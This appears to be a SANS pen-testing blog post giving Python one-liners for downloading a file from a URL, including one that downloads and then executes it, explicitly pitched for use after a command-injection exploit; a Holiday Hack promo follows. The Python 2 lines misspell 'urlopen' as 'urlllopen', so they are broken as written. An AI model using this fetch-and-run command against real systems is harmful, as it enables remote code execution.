Pen Test Poster: “White Board” – Python – Pythonic Web Client

Board Elements_clean_Pythonic Web Client

Downloading files from the command line is routine tasks for most security professionals.   For defenders, the Windows Schedule, SIM management interfaces, Web interfaces for appliances often allow you to schedule a single command for execution.   The offensive folks who exploit a command injection vulnerability often need a simple way to download and execute code in a single line.   Or perhaps your just need a simple, cross platform, line of code to add to your existing management script.   In all of these situations, having a single cross platform command you can run to download files form the internet is essential.  If there is a Python interpreter on your system you can easily download files with the following one line command.

python -c 'import urllib2;print urllib2.urlllopen("http://<url to download>").read()' | tee /tmp/<local filename to write>

 

If you want to execute the code after the download you just need to add a semicolon and execute the command.

python -c 'import urllib2;print urllib2.urlllopen("http://<url to download>").read()' | tee /tmp/<local filename to write> ; /tmp/<local filename to execute>

 

The script shown is compatible with Python 2 and won’t work on systems that have Python 3 as the default Python interpreter.   Today the majority of systems, in compliance with PEP 394, still use Python 2 as the default interpreter, but it won’t be too much longer before Python 3 is the default.   If you are unsure which version of Python your system is using you can run the following command to check.

$ python --version
Python 2.7.12

 

For those running Python 3, here is a script you can use to that is compatible with your system.

python3 -c 'import urllib.request; urllib.request.urlretrieve("http://<url to download","/tmp/<local filename>")'

 

Mark Baggett

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Leave a Reply

Your email address will not be published. Required fields are marked *